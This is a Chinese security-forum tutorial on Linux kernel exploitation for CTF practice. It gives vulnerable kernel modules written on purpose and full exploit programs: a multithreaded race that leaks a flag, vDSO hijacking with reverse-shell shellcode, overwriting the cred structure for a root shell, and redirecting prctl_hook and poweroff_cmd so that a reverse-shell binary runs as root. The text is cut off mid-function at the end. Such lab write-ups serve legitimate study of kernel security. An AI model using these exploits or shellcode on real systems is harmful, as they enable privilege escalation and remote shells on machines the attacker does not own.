本文为看雪论坛优秀文章
看雪论坛作者ID:PIG-007
一
多线程的真条件竞争
先给出自己编写的题目源码,参照多方题目,主要还是0CTF2018-baby。
#include <linux/module.h>#include <linux/version.h>#include <linux/kernel.h>#include <linux/types.h>#include <linux/kdev_t.h>#include <linux/fs.h>#include <linux/device.h>#include <linux/cdev.h>#include <asm/uaccess.h>#include <linux/slab.h>//设备驱动常用变量//static char *buffer_var = NULL;static char *buffer_var = NULL;static struct class *devClass; // Global variable for the device classstatic struct cdev cdev;static dev_t condition_dev_no;struct flagStruct{int len;char* flagUser;};static struct flagStruct* flagObj;static char* flag = "flag{PIG007NBHH}";static long condition_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);static int condition_open(struct inode *i, struct file *f);static int condition_close(struct inode *i, struct file *f);static bool chk_range_not_ok(ssize_t v1,ssize_t v2);static struct file_operations condition_fops ={.owner = THIS_MODULE,.open = condition_open,.release = condition_close,.unlocked_ioctl = condition_ioctl};// 设备驱动模块加载函数static int __init condition_init(void){printk(KERN_INFO "[i] Module condition registered");if (alloc_chrdev_region(&condition_dev_no, 0, 1, "condition") < 0){return -1;}if ((devClass = class_create(THIS_MODULE, "chardrv")) == NULL){unregister_chrdev_region(condition_dev_no, 1);return -1;}if (device_create(devClass, NULL, condition_dev_no, NULL, "condition") == NULL){printk(KERN_INFO "[i] Module condition error");class_destroy(devClass);unregister_chrdev_region(condition_dev_no, 1);return -1;}cdev_init(&cdev, &condition_fops);if (cdev_add(&cdev, condition_dev_no, 1) == -1){device_destroy(devClass, condition_dev_no);class_destroy(devClass);unregister_chrdev_region(condition_dev_no, 1);return -1;}printk(KERN_INFO "[i] <Major, Minor>: <%d, %d>\n", MAJOR(condition_dev_no), MINOR(condition_dev_no));return 0;}// 设备驱动模块卸载函数static void __exit condition_exit(void){// 释放占用的设备号unregister_chrdev_region(condition_dev_no, 1);cdev_del(&cdev);}// ioctl函数命令控制long condition_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){int retval = 0;printk(KERN_INFO "Ioctl Get!\n");switch (cmd) {case 111: //doubleCon //get flag_addrprintk("Your flag is at %llx! But I don't think you know it's content\n",flag);break;case 222: //doubleCon //print flagflagObj = (struct flagStruct*)arg;ssize_t userFlagAddr = flagObj->flagUser;ssize_t userFlagObjAddr = (ssize_t)flagObj;if(chk_range_not_ok(userFlagAddr,flagObj->len)&&chk_range_not_ok(userFlagObjAddr,0)&&(flagObj->len == strlen(flag))){if(!strncmp(flagObj->flagUser,flag,strlen(flag)))printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);elseprintk("Wrong!");break;}else{printk("Wrong!\n");break;}default:retval = -1;break;}return retval;}static bool chk_range_not_ok(ssize_t v1,ssize_t v2){if((v1 + v2) <= 0x7ffffffff000)return true;elsereturn false;}static int condition_open(struct inode *i, struct file *f){printk(KERN_INFO "[i] Module condition: open()\n");return 0;}static int condition_close(struct inode *i, struct file *f){kfree(buffer_var);//buffer_var = NULL;printk(KERN_INFO "[i] Module condition: close()\n");return 0;}module_init(condition_init);module_exit(condition_exit);MODULE_LICENSE("GPL");// MODULE_AUTHOR("blackndoor");// MODULE_DESCRIPTION("Module vuln overflow");
主要是线程的知识。
就是如果一个变量是全局的,那么在没有锁的情况就会导致一个程序的不同线程对该全局变量进行的竞争读写操作。就像这里给出的代码,首先flag在内核模块中是静态全局的:
static char* flag = "flag{PIG007NBHH}";//--------------------------------------------------if(chk_range_not_ok(userFlagAddr,flagObj->len)&&chk_range_not_ok(userFlagObjAddr,0)&&(flagObj->len == strlen(flag))){if(!strncmp(flagObj->flagUser,flag,strlen(flag)))printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);elseprintk("Wrong!");break;}else{printk("Wrong!\n");break;}
先检测传入的数据的地址是否是在用户空间,长度是否为flag的长度,传入的所有数据是否处在用户空间。如果都是,再判断传入的数据与flag是否一致,一致则打印flag,否则打印Wrong然后退出。
这么一看好像无法得到flag,首先flag我们不知道,是硬编码在内核模块中的。其次就算无法传入内核模块中的地址,意味着就算我们获得了内核模块中flag的地址和长度,传进去也会判定失败。
但是这是建立在一个线程中的,如果是多个线程呢。在我们传入用户空间的某个数据地址和长度之后,先进入程序的if语句,也就是进入如下if语句。
if(chk_range_not_ok(userFlagAddr,flagObj->len)&&chk_range_not_ok(userFlagObjAddr,0)&&(flagObj->len == strlen(flag)))
然后在检测flag数据之前,也就是如下if语句之前,启动另外一个线程把传入的该数据地址给改成内核模块的flag的数据地址,这样就能成功打印flag了。
if(!strncmp(flagObj->flagUser,flag,strlen(flag)))那么就直接给出POC,这里涉及到一些线程的操作,可以自己学习一下。
// gcc -static exp.c -lpthread -o exp#include <string.h>//char *strstr(const char *haystack, const char *needle);//#define _GNU_SOURCE /* See feature_test_macros(7) *///char *strcasestr(const char *haystack, const char *needle);#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/ioctl.h>#include <fcntl.h>#include <pthread.h>#include <errno.h>#include <sys/mman.h>#include <assert.h>#define TRYTIME 0x1000struct flagStruct{int len;char* flagUseAddr;};struct flagStruct flagChunk;//open devint openDev(char* pos);char readFlagBuf[0x1000+1]={0};int finish =0;unsigned long long flagKerneladdr;void changeFlagAddr(void* arg);int main(int argc, char *argv[]){setvbuf(stdin,0,2,0);setvbuf(stdout,0,2,0);setvbuf(stderr,0,2,0);int devFD;int addrFD;unsigned long memOffset;pthread_t thread;//open Devchar* pos = "/dev/condition";devFD = openDev(pos);char flagBuf[16] = {0};flagReadFun(devFD,16,flagBuf);system("dmesg > /tmp/record.txt");addrFD = open("/tmp/record.txt",O_RDONLY);lseek(addrFD,-0x1000,SEEK_END);read(addrFD,readFlagBuf,0x1000);close(addrFD);int flagIdxInBuf;flagIdxInBuf = strstr(readFlagBuf,"Your flag is at ");if (flagIdxInBuf == 0){printf("[-]Not found addr");exit(-1);}else{flagIdxInBuf+=16;flagKerneladdr = strtoull(flagIdxInBuf,flagIdxInBuf+16,16);printf("[+]flag addr: %p\n",flagKerneladdr);}pthread_create(&thread, NULL, changeFlagAddr,&flagChunk);for(int i=0;i<TRYTIME;i++){flagJudgeFun(devFD,16,&flagBuf);}finish = 1;pthread_join(thread, NULL);close(devFD);puts("[+]result is :");system("dmesg | grep flag");return 0;}int openDev(char* pos){int devFD;printf("[+] Open %s...\n",pos);if ((devFD = open(pos, O_RDWR)) < 0) {printf(" Can't open device file: %s\n",pos);exit(1);}return devFD;}void flagReadFun(int devFD,int len,char *buf){flagChunk.len = len;flagChunk.flagUseAddr = buf;ioctl(devFD,111,&flagChunk);}void flagJudgeFun(int devFD,int len,char *buf){flagChunk.len = len;flagChunk.flagUseAddr = buf;ioctl(devFD,222,&flagChunk);}void changeFlagAddr(void* arg){struct flagStruct * flagPTChunk = arg;while(finish==0){//s1->flagUseAddr = flagKerneladdr;flagPTChunk->flagUseAddr = flagKerneladdr;}}
最后如下效果:
需要注意的是在gcc编译的时候需要加上-lpthread多线程的参数。还有线程的回调函数必须传入至少一个参数,不管该参数在里面有没有被用到。
使用userfaultfd还不太会,之后再补。
二
任意读写漏洞
内核里的读写漏洞利用方式与用户态有点不太一样,利用方式也是多种多样。
首先给出下题目:
#include <linux/module.h>#include <linux/version.h>#include <linux/kernel.h>#include <linux/types.h>#include <linux/kdev_t.h>#include <linux/fs.h>#include <linux/device.h>#include <linux/cdev.h>#include <asm/uaccess.h>#include <linux/slab.h>//设备驱动常用变量//static char *buffer_var = NULL;static char *buffer_var = NULL;static struct class *devClass; // Global variable for the device classstatic struct cdev cdev;static dev_t arbWriteModule_dev_no;struct arbWriteNote{ssize_t addr;ssize_t len;char* data;};static struct arbWriteNote* arbNoteObj;static long arbWriteModule_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);static int arbWriteModule_open(struct inode *i, struct file *f);static int arbWriteModule_close(struct inode *i, struct file *f);static struct file_operations arbWriteModule_fops ={.owner = THIS_MODULE,.open = arbWriteModule_open,.release = arbWriteModule_close,.unlocked_ioctl = arbWriteModule_ioctl};// 设备驱动模块加载函数static int __init arbWriteModule_init(void){printk(KERN_INFO "[i] Module arbWriteModule registered");if (alloc_chrdev_region(&arbWriteModule_dev_no, 0, 1, "arbWriteModule") < 0){return -1;}if ((devClass = class_create(THIS_MODULE, "chardrv")) == NULL){unregister_chrdev_region(arbWriteModule_dev_no, 1);return -1;}if (device_create(devClass, NULL, arbWriteModule_dev_no, NULL, "arbWriteModule") == NULL){printk(KERN_INFO "[i] Module arbWriteModule error");class_destroy(devClass);unregister_chrdev_region(arbWriteModule_dev_no, 1);return -1;}cdev_init(&cdev, &arbWriteModule_fops);if (cdev_add(&cdev, arbWriteModule_dev_no, 1) == -1){device_destroy(devClass, arbWriteModule_dev_no);class_destroy(devClass);unregister_chrdev_region(arbWriteModule_dev_no, 1);return -1;}printk(KERN_INFO "[i] <Major, Minor>: <%d, %d>\n", MAJOR(arbWriteModule_dev_no), MINOR(arbWriteModule_dev_no));return 0;}// 设备驱动模块卸载函数static void __exit arbWriteModule_exit(void){// 释放占用的设备号unregister_chrdev_region(arbWriteModule_dev_no, 1);cdev_del(&cdev);}// ioctl函数命令控制long arbWriteModule_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){char* chunk = NULL;char* buf;int retval = 0;switch (cmd) {case 111: //arbReadprintk("Arbitrarily read function!---111\n");arbNoteObj = (struct arbWriteNote*)arg;copy_to_user(arbNoteObj->data,(char*)arbNoteObj->addr,arbNoteObj->len);break;case 222: //arbWriteprintk("Arbitrarily write function!---222\n");arbNoteObj = (struct arbWriteNote*)arg;buf = kmalloc(arbNoteObj->len,GFP_KERNEL);copy_from_user(buf,arbNoteObj->data,arbNoteObj->len);memcpy((char*)arbNoteObj->addr,buf,arbNoteObj->len);kfree(buf);break;default:retval = -1;break;}return retval;}static int arbWriteModule_open(struct inode *i, struct file *f){printk(KERN_INFO "[i] Module arbWriteModule: open()\n");return 0;}static int arbWriteModule_close(struct inode *i, struct file *f){//kfree(buffer_var);//buffer_var = NULL;printk(KERN_INFO "[i] Module arbWriteModule: close()\n");return 0;}module_init(arbWriteModule_init);module_exit(arbWriteModule_exit);MODULE_LICENSE("GPL");// MODULE_AUTHOR("blackndoor");// MODULE_DESCRIPTION("Module vuln overflow");
可以看到传入一个结构体,包含数据指针和地址,直接任意读写。
vdso的代码数据在内核里,当程序需要使用时,会将vdso的内核映射给进程,也就是相当于把内核空间的vdso原封不动地复制到用户空间,然后调用在用户空间的vdso代码。
如果我们能够将vdso给劫持为shellcode,那么当具有root权限的程序调用vdso时,就会触发我们的shellcode,而具有root权限的shellcode可想而知直接就可以。而vdso是经常会被调用的,所有只要我们劫持了vdso,大概率都会运行到我们的shellcode。
真实环境中crontab会调用vdso中的gettimeofday,且是root权限的调用。
而ctf题目中就通常可以用一个小程序来模拟调用。
#include <stdio.h>int main(){while(1){sleep(1);gettimeofday();}}
将这个程序编译后放到init中,用nohup挂起,即可做到root权限调用gettimeofday:
nohup /gettimeofday &由于不同版本的linux内核中的vdso偏移不同,而题目给的vmlinux通常又没有符号表,所以需要我们自己利用任意读漏洞来测量。(如果题目没有任意读漏洞,建议可以自己编译一个对应版本的内核,然后自己写一个具备任意读的模块,加载之后测量即可,或者进行爆破,一般需要爆破一个半字节)
例如这里给出的代码示例,就可以通过如下代码来将vdso从内核中dump下来。不过这种方式dump的是映射到用户程序的vdso,虽然内容是一样的,不过vdso在内核中的偏移却没有办法确定。
#include <stdio.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <sys/auxv.h>#include <sys/mman.h>int main(){int test;size_t result=0;unsigned long sysinfo_ehdr = getauxval(AT_SYSINFO_EHDR);result=memmem(sysinfo_ehdr,0x1000,"gettimeofday",12);printf("[+]VDSO : %p\n",sysinfo_ehdr);printf("[+]The offset of gettimeofday is : %x\n",result-sysinfo_ehdr);scanf("Wait! %d", test);/*gdb break point at 0x400A36and then dump memorywhy only dump 0x1000 ???*/if (sysinfo_ehdr!=0){for (int i=0;i<0x2000;i+=1){printf("%02x ",*(unsigned char *)(sysinfo_ehdr+i));}}}
这种方法的原理是通过寻找gettimeofday字符串来得到映射到程序中的vdso的内存页,如下:
之后把下面的内容都复制,放到CyberChef中,利用From Hex功能得到二进制文件。
然后就将得到的文件放到IDA中,即可自动解析到对应gettimeofday函数相对于vdso的函数偏移。
这里就当是0xb20。
之后通过任意读,类似基于本题编写的以下代码,获取vdso相对于vmlinux基址的偏移。
#include <string.h>#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/ioctl.h>#include <fcntl.h>#include <errno.h>#include <sys/mman.h>#include <assert.h>#include <unistd.h>#include <fcntl.h>#include <sys/prctl.h>#include <sys/time.h>#include <sys/auxv.h>struct arbWriteNote{ssize_t addr;ssize_t len;char* data;};struct arbWriteNote arbWriteObj;int get_gettimeofday_str_offset();int main(int argc, char *argv[]){int gettimeofday_str_offset = get_gettimeofday_str_offset();printf("gettimeofday str in vdso.so offset=0x%x\n",gettimeofday_str_offset);size_t vdso_addr = -1;for (size_t addr=0xffffffff80000000;addr < 0xffffffffffffefff;addr += 0x1000) {//读取一页数据arbitrary_read(devFD,0x1000,buf,addr);//如果在对应的偏移处,正好是这个字符串,那么我们就能确定当前就是vdso的地址//之所以能确定,是因为我们每次读取了0x1000字节数据,也就是1页,而vdso的映射也只是1页if (!strcmp(buf+gettimeofday_str_offset,"gettimeofday")) {printf("[+]find vdso.so!!\n");vdso_addr = addr;printf("[+]vdso in kernel addr=0x%lx\n",vdso_addr);break;}}}//获取vdso里的字符串"gettimeofday"相对vdso.so的偏移int get_gettimeofday_str_offset() {//获取当前程序的vdso.so加载地址0x7ffxxxxxxxxsize_t vdso_addr = getauxval(AT_SYSINFO_EHDR);char* name = "gettimeofday";if (!vdso_addr) {printf("[-]error get name's offset\n");}//仅需要搜索1页大小即可,因为vdso映射就一页0x1000size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));if (name_addr < 0) {printf("[-]error get name's offset\n");}return name_addr - vdso_addr;}
之后得到具体的地址。
那么最终的gettimeofday相对于vmlinux基地址就是:
gettimeofday_addr = 0xffffffff81e04b20+0xb20最终利用任意写,将gettimeofday函数的内容改为我们的shellcode即可。
// gcc -static exp.c -o exp// ffffffff810a78d0 T SyS_gettimeofday// ffffffff810a78d0 T sys_gettimeofday// ffffffff810b08f0 T do_gettimeofday// ffffffff810c7350 T compat_SyS_gettimeofday// ffffffff810c7350 T compat_sys_gettimeofday//0x13d#include <string.h>#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/ioctl.h>#include <fcntl.h>#include <errno.h>#include <sys/mman.h>#include <assert.h>#include <unistd.h>#include <fcntl.h>#include <sys/prctl.h>#include <sys/time.h>#include <sys/auxv.h>#define GETTIMEOFDAY_FUN 0xB20struct arbWriteNote{ssize_t addr;ssize_t len;char* data;};struct arbWriteNote arbWriteObj;//用于反弹shell的shellcode,127.0.0.1:3333//或者在比赛中可以直接写类似Orw打开flag的shellcodechar shellcode[]="\x90\x53\x48\x31\xC0\xB0\x66\x0F\x05\x48\x31\xDB\x48\x39\xC3\x75\x0F\x48\x31\xC0\xB0\x39\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x09\x5B\x48\x31\xC0\xB0\x60\x0F\x05\xC3\x48\x31\xD2\x6A\x01\x5E\x6A\x02\x5F\x6A\x29\x58\x0F\x05\x48\x97\x50\x48\xB9\xFD\xFF\xF2\xFA\x80\xFF\xFF\xFE\x48\xF7\xD1\x51\x48\x89\xE6\x6A\x10\x5A\x6A\x2A\x58\x0F\x05\x48\x31\xDB\x48\x39\xD8\x74\x07\x48\x31\xC0\xB0\xE7\x0F\x05\x90\x6A\x03\x5E\x6A\x21\x58\x48\xFF\xCE\x0F\x05\x75\xF6\x48\x31\xC0\x50\x48\xBB\xD0\x9D\x96\x91\xD0\x8C\x97\xFF\x48\xF7\xD3\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\x48\x31\xD2\xB0\x3B\x0F\x05\x48\x31\xC0\xB0\xE7\x0F\x05";//open devint openDev(char* pos);int get_gettimeofday_str_offset();int main(int argc, char *argv[]){setvbuf(stdin,0,2,0);setvbuf(stdout,0,2,0);setvbuf(stderr,0,2,0);int devFD;int addrFD;unsigned long memOffset;pthread_t thread;//open Devchar* pos = "/dev/arbWriteModule";devFD = openDev(pos);char *buf = (char *)calloc(1,0x1000);int gettimeofday_str_offset = get_gettimeofday_str_offset();printf("gettimeofday str in vdso.so offset=0x%x\n",gettimeofday_str_offset);size_t vdso_addr = -1;for (size_t addr=0xffffffff80000000;addr < 0xffffffffffffefff;addr += 0x1000) {//读取一页数据arbitrary_read(devFD,0x1000,buf,addr);//如果在对应的偏移处,正好是这个字符串,那么我们就能确定当前就是vdso的地址//之所以能确定,是因为我们每次读取了0x1000字节数据,也就是1页,而vdso的映射也只是1页if (!strcmp(buf+gettimeofday_str_offset,"gettimeofday")) {printf("[+]find vdso.so!!\n");vdso_addr = addr;printf("[+]vdso in kernel addr=0x%lx\n",vdso_addr);break;}}if (vdso_addr == -1) {printf("[-]can't find vdso.so!!\n");}size_t gettimeofday_addr = vdso_addr + GETTIMEOFDAY_FUN;printf("[+]gettimeofday function in kernel addr=0x%lx\n",gettimeofday_addr);//将gettimeofday处写入我们的shellcode,因为写操作在内核驱动里完成,内核可以读写执行vdso//用户只能读和执行vdsoarbitrary_write(devFD,strlen(shellcode),shellcode,gettimeofday_addr);sleep(1);printf("[+]open a shell\n");system("nc -lvnp 3333");return 0;}int openDev(char* pos){int devFD;printf("[+] Open %s...\n",pos);if ((devFD = open(pos, O_RDWR)) < 0) {printf(" Can't open device file: %s\n",pos);exit(1);}return devFD;}//获取vdso里的字符串"gettimeofday"相对vdso.so的偏移int get_gettimeofday_str_offset() {//获取当前程序的vdso.so加载地址0x7ffxxxxxxxxsize_t vdso_addr = getauxval(AT_SYSINFO_EHDR);char* name = "gettimeofday";if (!vdso_addr) {printf("[-]error get name's offset\n");}//仅需要搜索1页大小即可,因为vdso映射就一页0x1000size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));if (name_addr < 0) {printf("[-]error get name's offset\n");}return name_addr - vdso_addr;}void arbitrary_read(int devFD,int len,char *buf,size_t addr){arbWriteObj.len = len;arbWriteObj.data = buf;arbWriteObj.addr = addr;ioctl(devFD,111,&arbWriteObj);}void arbitrary_write(int devFD,int len,char *buf,size_t addr){arbWriteObj.len = len;arbWriteObj.data = buf;arbWriteObj.addr = addr;ioctl(devFD,222,&arbWriteObj);}
参考:
(15条消息) linux kernel pwn学习之劫持vdso_seaaseesa的博客-CSDN博客
(https://blog.csdn.net/seaaseesa/article/details/104694219?ops_request_misc=%7B%22request%5Fid%22%3A%22163469082516780357227209%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fblog.%22%7D&request_id=163469082516780357227209&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v2~rank_v29-7-104694219.pc_v2_rank_blog_default&utm_term=kernel&spm=1018.2226.3001.4450)
还有bsauce师傅的简书:https://www.jianshu.com/p/07994f8b2bb0
这个没啥好讲的,就是覆盖uig和gid为零蛋就行,唯一需要的就是寻找cred的地址。
task_srtuct结构体是每个进程都会创建的一个结构体,保存当前进程的很多内容,其中就包括当前进程的cred结构体指针。
//version 4.4.72struct task_struct {//............................................/* process credentials */const struct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */const struct cred __rcu *real_cred; /* objective and real subjective task* credentials (COW) */const struct cred __rcu *cred; /* effective (overridable) subjective task* credentials (COW) */char comm[TASK_COMM_LEN]; /* executable name excluding path- access with [gs]et_task_comm (which lockit with task_lock())- initialized normally by setup_new_exec *///............................................}
给出的题目编译在4.4.72内核下。
也就是可以将comm[TASK_COMM_LEN]设置为指定的字符串,相当于打个标记,不过不同版本中可能有所不同,不如最新版本V5.14.13的Linux内核就有所不同,其中还加了一个key结构体指针:
//version 5.14.13struct task_struct {//............................................#ifdef CONFIG_THREAD_INFO_IN_TASK/** For reasons of header soup (see current_thread_info()), this* must be the first element of task_struct.*/stru/* Tracer's credentials at attach: */const struct cred __rcu *ptracer_cred;/* Objective and real subjective task credentials (COW): */const struct cred __rcu *real_cred;/* Effective (overridable) subjective task credentials (COW): */const struct cred __rcu *cred;#ifdef CONFIG_KEYS/* Cached requested key. */struct key *cached_requested_key;#endif/** executable name, excluding path.** - normally initialized setup_new_exec()* - access it with [gs]et_task_comm()* - lock it with task_lock()*/char comm[TASK_COMM_LEN];//............................................}
然后就可以利用prctl函数的PR_SET_NAME功能来设置task_struct结构体中的comm[TASK_COMM_LEN]成员。
char target[16];strcpy(target,"tryToFindPIG007");prctl(PR_SET_NAME,target);
通过内存搜索,比对我们输入的标记字符串,可以定位comm[TASK_COMM_LEN]成员地址,比如设置标记字符串为"tryToFindPIG007":
可以查看当前Cred结构中的内容:
//search target chrchar *buf = (char *)calloc(1,0x1000);puts("[+] we can read and write any memory");for(;addr<0xffffc80000000000;addr+=0x1000){arbitrary_read(devFD,0x1000,buf,addr);result=memmem(buf,0x1000,target,16);if (result){printf("result:%p\n",result);cred= * (size_t *)(result-0x8);real_cred= *(size_t *)(result-0x10);// if ((cred||0xff00000000000000) && (real_cred == cred))// {target_addr=addr+result-(int)(buf);printf("[+]found task_struct 0x%lx\n",target_addr);printf("[+]found cred 0x%lx\n",real_cred);break;// }}}
这个就不多说了,获取到cred地址之后直接写就行了。
// gcc -static exp.c -o exp#include <string.h>#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/ioctl.h>#include <fcntl.h>#include <errno.h>#include <sys/mman.h>#include <assert.h>#include <unistd.h>#include <fcntl.h>#include <sys/prctl.h>#include <sys/time.h>#include <sys/auxv.h>struct arbWriteNote{ssize_t addr;ssize_t len;char* data;};struct arbWriteNote arbWriteObj;//open devint openDev(char* pos);int main(int argc, char *argv[]){setvbuf(stdin,0,2,0);setvbuf(stdout,0,2,0);setvbuf(stderr,0,2,0);int devFD;int addrFD;unsigned long memOffset;size_t addr=0xffff880000000000;size_t cred=0;size_t real_cred=0;size_t target_addr;size_t result=0;char root_cred[28] = {0};//set comm[TASK_COMM_LEN]char target[16];strcpy(target,"tryToFindPIG007");prctl(PR_SET_NAME,target);//open Devchar* pos = "/dev/arbWriteModule";devFD = openDev(pos);//search target chrchar *buf = (char *)calloc(1,0x1000);puts("[+] we can read and write any memory");for(;addr<0xffffc80000000000;addr+=0x1000){arbitrary_read(devFD,0x1000,buf,addr);result=memmem(buf,0x1000,target,16);if (result){printf("result:%p\n",result);cred= * (size_t *)(result-0x8);real_cred= *(size_t *)(result-0x10);// if ((cred||0xff00000000000000) && (real_cred == cred))// {target_addr=addr+result-(int)(buf);printf("[+]found task_struct 0x%lx\n",target_addr);printf("[+]found cred 0x%lx\n",real_cred);break;// }}}if (result==0){puts("not found , try again ");exit(-1);}arbitrary_write(devFD,28,root_cred,real_cred);if (getuid()==0){printf("[+]now you are r00t,enjoy ur shell\n");system("/bin/sh");}else{puts("[-] there must be something error ... ");exit(-1);}return 0;}int openDev(char* pos){int devFD;printf("[+] Open %s...\n",pos);if ((devFD = open(pos, O_RDWR)) < 0) {printf(" Can't open device file: %s\n",pos);exit(1);}return devFD;}void arbitrary_read(int devFD,int len,char *buf,size_t addr){arbWriteObj.len = len;arbWriteObj.data = buf;arbWriteObj.addr = addr;ioctl(devFD,111,&arbWriteObj);}void arbitrary_write(int devFD,int len,char *buf,size_t addr){arbWriteObj.len = len;arbWriteObj.data = buf;arbWriteObj.addr = addr;ioctl(devFD,222,&arbWriteObj);}
不过这个如果不加判断 if ((cred||0xff00000000000000) && (real_cred == cred))搜索出来的cred可能就不是当前进程,具有一定概率性,具体原因不知,可能是搜索到了用户进程下的字符串?
prctl->security_task_prctl->*prctl_hook
orderly_poweroff->__orderly_poweroff->run_cmd(poweroff_cmd)-> call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC)
原本capability_hooks+440存放的是cap_task_prctl的地址。
但是经过我们的劫持之后存放的是orderly_poweroff的地址。
之前讲的prctl_hook指的就是capability_hooks+440。
这样劫持之后我们就能调用到orderly_poweroff函数了。
而orderly_poweroff函数中会调用实际__orderly_poweroff函数,有如下代码:
//version 4.4.72static int __orderly_poweroff(bool force){int ret;ret = run_cmd(poweroff_cmd);if (ret && force) {pr_warn("Failed to start orderly shutdown: forcing the issue\n");/** I guess this should try to kick off some daemon to sync and* poweroff asap. Or not even bother syncing if we're doing an* emergency shutdown?*/emergency_sync();kernel_power_off();}return ret;}
这里就调用到run_cmd(poweroff_cmd),而run_cmd函数有如下代码:
//version 4.4.72static int run_cmd(const char *cmd){char **argv;static char *envp[] = {"HOME=/","PATH=/sbin:/bin:/usr/sbin:/usr/bin",NULL};int ret;argv = argv_split(GFP_KERNEL, cmd, NULL);if (argv) {ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);argv_free(argv);} else {ret = -ENOMEM;}return ret;}
这里就调用到call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC),这里的参数rdi中就是poweroff_cmd。所以如果我们可以劫持poweroff_cmd为我们的程序名字字符串,那么就可以调用call_usermodehelpe函数来启动我们的程序。而poweroff_cmd是一个全局变量,可以直接获取地址进行修改。
而call_usermodehelpe函数启动程序时是以root权限启动的,所以如果我们的程序运行/bin/sh且以root权限启动,那么就完成了提权。
可以通过编写一个小程序,然后给security_task_prctl函数下断点,运行到call QWORD PTR[rbx+0x18]即可看到对应的rbx+0x18上存放的地址,将其修改为orderly_poweroff函数即可。
可以直接使用nm命令来获取,或者直接进入gdb打印即可。
此外orderly_poweroff也是一样的获取。如果无法查到,那么可以启动qemu,先设置为root权限后
cat /proc/kallsyms | grep "orderly_poweroff"即可,或者编译一个对应版本的内核进行查询。
▲最后fork一个子进程来触发反弹shell即可
// gcc -static exp.c -o exp//ffffffff812adb90 T security_task_prctl#include <string.h>#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <sys/stat.h>#include <sys/ioctl.h>#include <fcntl.h>#include <errno.h>#include <sys/mman.h>#include <assert.h>#include <unistd.h>#include <fcntl.h>#include <sys/prctl.h>#include <sys/time.h>#include <sys/auxv.h>//poweroff字符串的偏移#define POWEROFF_CMD 0xe39c40//orderly_poweroff函数的偏移#define ORDERLY_POWEROFF 0x070060//prctl_hook的偏移#define PRCTL_HOOK 0xe7c7d8;struct arbWriteNote{ssize_t addr;ssize_t len;char* data;};struct arbWriteNote arbWriteObj;//open devint openDev(char* pos);int get_gettimeofday_str_offset();int main(int argc, char *argv[]){setvbuf(stdin,0,2,0);setvbuf(stdout,0,2,0);setvbuf(stderr,0,2,0);int devFD;//open Devchar* pos = "/dev/arbWriteModule";devFD = openDev(pos);// //set comm[TASK_COMM_LEN]// char target[16];// strcpy(target,"tryToFindPIG007");// prctl(PR_SET_NAME,target);char *buf = (char *)calloc(1,0x1000);int gettimeofday_str_offset = get_gettimeofday_str_offset();printf("gettimeofday str in vdso.so offset=0x%x\n",gettimeofday_str_offset);size_t vdso_addr = -1;for (size_t addr=0xffffffff80000000;addr < 0xffffffffffffefff;addr += 0x1000) {//读取一页数据arbitrary_read(devFD,0x1000,buf,addr);//如果在对应的偏移处,正好是这个字符串,那么我们就能确定当前就是vdso的地址//之所以能确定,是因为我们每次读取了0x1000字节数据,也就是1页,而vdso的映射也只是1页if (!strcmp(buf+gettimeofday_str_offset,"gettimeofday")) {printf("[+]find vdso.so!!\n");vdso_addr = addr;printf("[+]vdso in kernel addr=0x%lx\n",vdso_addr);break;}}if (vdso_addr == -1) {printf("[-]can't find vdso.so!!\n");}//计算出kernel基地址size_t kernel_base = vdso_addr & 0xffffffffff000000;printf("[+]kernel_base=0x%lx\n",kernel_base);size_t poweroff_cmd_addr = kernel_base + POWEROFF_CMD;printf("[+]poweroff_cmd_addr=0x%lx\n",poweroff_cmd_addr);size_t orderly_poweroff_addr = kernel_base + ORDERLY_POWEROFF;printf("[+]orderly_poweroff_addr=0x%lx\n",orderly_poweroff_addr);size_t prctl_hook_addr = kernel_base + PRCTL_HOOK;printf("[+]prctl_hook_addr=0x%lx\n",prctl_hook_addr);//反弹shell,执行的二进制文件,由call_usermodehelper来执行,自带rootchar reverse_command[] = "/reverse_shell";//修改poweroff_cmd_addr处的字符串为我们需要执行的二进制文件的路径arbitrary_write(devFD,strlen(reverse_command),reverse_command,poweroff_cmd_addr);//hijack prctl,使得task_prctl指向orderly_poweroff函数arbitrary_write(devFD,0x8,&orderly_poweroff_addr,prctl_hook_addr);if (fork() == 0) { //fork一个子进程,来触发shell的反弹prctl(0,0);exit(-1);} else {printf("[+]open a shell\n");system("nc -lvnp 7777");}return 0;}int openDev(char* pos){int devFD;printf("[+] Open %s...\n",pos);if ((devFD = open(pos, O_RDWR)) < 0) {printf(" Can't open device file: %s\n",pos);exit(1);}return devFD;}//获取vdso里的字符串"gettimeofday"相对vdso.so的偏移int get_gettimeofday_str_offset() {//获取当前程序的vdso.so加载地址0x7ffxxxxxxxxsize_t vdso_addr = getauxval(AT_SYSINFO_EHDR);char* name = "gettimeofday";if (!vdso_addr) {printf("[-]error get name's offset\n");}//仅需要搜索1页大小即可,因为vdso映射就一页0x1000size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));if (name_addr < 0) {printf("[-]error get name's offset\n");}return name_addr - vdso_addr;}void arbitrary_read(int devFD,int len,char *buf,size_t addr){arbWriteObj.len = len;arbWriteObj.data = buf;arbWriteObj.addr = 